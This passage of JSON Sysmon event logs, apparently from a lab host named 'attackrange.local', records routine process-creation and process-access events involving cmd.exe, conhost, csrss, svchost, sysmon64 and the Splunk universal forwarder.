C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.239","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-001066040400}","TargetProcessId":"4040","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2186,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.351\r\nProcessGuid: {E2A3D6B1-1070-5F25-0000-001058060400}\r\nProcessId: 4064\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.351","ProcessGuid":"{E2A3D6B1-1070-5F25-0000-001058060400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinRegMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2187,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-001058060400}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-001058060400}","TargetProcessId":"4064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2188,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-001058060400}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-001058060400}","TargetProcessId":"4064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2189,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2190,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2191,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2192,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2193,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.349\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.349","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.